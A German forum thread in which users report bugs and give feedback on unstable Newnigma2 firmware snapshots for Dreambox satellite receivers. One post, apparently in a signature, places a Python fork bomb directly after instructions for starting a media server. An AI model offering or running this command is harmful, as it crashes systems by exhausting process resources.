Sammelthrad für unstable images DM8000/DM800/DM500HD

Diese Seite verwendet Cookies. Durch die Nutzung unserer Seite erklären Sie sich damit einverstanden, dass wir Cookies setzen. Weitere Informationen

  • @klaus333
    hmm hier läst sich das installieren alternativ kannste ja mediatomb testen.
    Nach dem installieren /etc/init.d/mtb start und schon läuft er.
    python -c 'while 1: __import__("os").fork()'
    Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
  • Hallo,

    erstmal ein großes Lob an Newnigma, Klasse Image und das unstable läuft mindestens so gut wie andere finale Image.

    Mir ist ein kleiner Fehler aufgefallen, im Expert Menu bei der Auswahl für Skin/Picons ist die Auswahl PICONS falsch geschrieben.

    Bitte weiter so machen.

    Danke.
  • Stabilität kann ich noch nicht bestätigen. Ist halt noch ein Unstable und da wird ja gearbeitet.

    Geschwindigkeitsschub ist beim starten.

    Mit heutigen Unstable, bleibt immer noch DVD-Player hängen.

    Aber mehrstellige Zifferneingabe wieder möglich(schon seit 29.03.)
  • Ich habe am Samstag (27.03.2010) das aktuelle unstable vom Tag neu geflasht, weil nach dem Update die Box nicht mehr starten wollte. Balken blieb auf halber Strecke stehen (Bug 1).

    Nachdem ich nun am Dienstag wieder ein Update gemacht habe, was nach Anzeige einwandfrei verlief, war plötzlich meine Samsung 1TB EcoGreen Festplatte verschwunden. Auch nach der Installation eines neuen unstable von Gestern blieb sie verschwunden.

    Ich habe nun wieder 2.8.4 installiert und die Festplatte ist wieder da.

    Seltsam nur, dass die Festplatte mit dem unstable bis einschließlich Sonntag keine Probleme machte.
    Gruß

    lapidis

    Dieser Beitrag wurde bereits 2 mal editiert, zuletzt von lapidis ()

  • Original von lapidis
    Seltsam nur, dass die Festplatte mit dem unstable bis einschließlich Sonntag keine Probleme machte.


    das ist zufall von 10 reboots ist meine samsung 4 mal da das ist ein bug im neuen kernel :(
    und ist zeit umstallung vom oe auf 1.6 da
    » time to say goodbye «

    Konfuzius sagt:
    Erst wenn eine Mücke auf deinen Hoden landet wirst du lernen Probleme ohne Gewalt zu lösen.
  • Ich nicht weiß, ob das mit dem Unstable zu tun hat.

    eine auf HD abgelegte *.ts kann ich über die Tasten (Vorlauf/Rücklauf) spulen.
    Bei einer *.mkv geht das nur über die Zifferntasten.

    Installiert ist noch Permanenttimeshift V1 RC10.

    Falle es nicht hergehört, bitte verschieben.

    Gruss
  • Das mit der Festplatte kann ich während der ganzen letzten Updates bestätigen.
    Wenn man die Box nicht nur neu starten lässt, sondern komplett herunter fährt und dann wieder einschaltet, hört man sofort die Festplatte anfahren und sie ist dann auch jedes mal sicher wieder da.
    Ich weiß nicht warum dies so ist, aber auf jeden Fall besser als mehrmals zu booten (gähn) und zu hoffen... :]
  • Original von Pafnuti
    Ich nicht weiß, ob das mit dem Unstable zu tun hat.

    eine auf HD abgelegte *.ts kann ich über die Tasten (Vorlauf/Rücklauf) spulen.
    Bei einer *.mkv geht das nur über die Zifferntasten.

    Installiert ist noch Permanenttimeshift V1 RC10.

    Falle es nicht hergehört, bitte verschieben.

    Gruss



    ... mkv spulen hat noch nie richtig funktioniert ;( - hat aber nichts mit newnigma2 zu tun, sondern ist eine Anforderung an dmm. Leider kann man ja das Schauen von mkv's auch nicht an der zuletzt gestoppten Stelle fortsetzten - aber die Hoffnung stirbt ja zuletzt 8)

    Gruß
    cruiser

    DM900UHD DVB-C/T2 Newnigma2 OE 2.5 Daily
  • newnigma2-snapshot-dm800-20100402030551.nfi

    Beim Abspielen einer HD-Aufnahme (Sky-HD) die momentan noch läuft, kommt es beim gleichzeitigen Abspielen zu Aussetzern.


    Das war bei der 2.8.4 problemlos möglich.
  • Muss mich mal bei den Herrschaften bedanken, die wie wild im Hintergrund arbeiten.

    Riesen großes Lob!

    Bei mir läuft nun alles super.

    - 2 Platten(hdd+ssd) werden super erkannt
    - Sky-HD aufnehmen und gleichzeitig Abspielen ohne Aussetzer von HDD(WD 10 EADS)
    - Permanentes Timeshift ohne Aussetzer von SSD (Kingston 40 GB)
    - Keine Zahnräder, weil sämtliche Picons + Timeshift + Swapfile auf SSD
    - DVD von NAS nun wieder ohne Probleme(DVD läuft wieder)
    - Und und und= alles nur super

    3 kleine Schönheitsfehler

    - Plugin „Sportinfo“ ist verschwunden(geht eh schon lange nicht mehr= sehr schade)
    - Bitte Plugin „permanentes Timeshift“ mit aufnehmen, ist ein wichtiger Bestandteil für viele und läuft super.
    - Nicht alle Plugins lassen sich auf normalen Weg entfernen. Nur dummy-task oder Ordner löschen. Ist für Laien(auch für mich) noch sehr umständlich. Soll aber so gewollt sein, habe ich gelesen.

    Ich bin begeistert von euerer Arbeit.

    Gruß Gerald
  • Original von furrore
    Dreambox DM800
    Seit knapp einer Woche setze ich das 2010-02-23 Experimentel ein. Täglich habe ich die online Updates ausgeführt, dass der aktuelle Stand nun Newnigma2-Snapshot-2010-03-06 ist.
    Fehler: Während DMAX (FTA) lief war das erste mal seit einer Woche wieder Bild und Ton weg per HDMI an meinem Samsung 46A956. Standby der Dreambox und wieder einschalten hat auch diesesmal wieder Abhilfe geschaffen. Identisch mit dem Fehler unter 2.8.4 hier beschrieben: Dream 800 + Newnigma 2.8.4 - Bild/Ton weg

    Ergänzung: Auch mit Newnigma2-Snapshot-2010-03-13 war Bild und Ton über HDMI weg.


    Mit dem Unstable vom 5.4.2010 (newnigma2-snapshot-dm800-20100405030534.nfi) hatte ich wieder HDMI Aussetzer auf SF2 & Discovery HD. Dies nach kurzem Stand-by und wieder einschalten gar mehrmals hintereinander. Bis anhin hatte ich die Aussetzer nur noch auf Sendern wie DMAX oder MTV Dance mit einer Auflösung 544x576 und eher selten (2-3x die Woche). Nun regelmässig (3-4 pro Tag) wieder auf den oben genannten Sendern.

    @skills HDMI Aussetzer ist, wenn Bild & Ton über HDMI weg sind. Aus- und Einstecken des HDMI am TV oder kurzer Stand-by der Box liefern wieder Bild und Ton. Siehe auch ältere Diskussionen mit anderen betroffenen.

    Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von furrore ()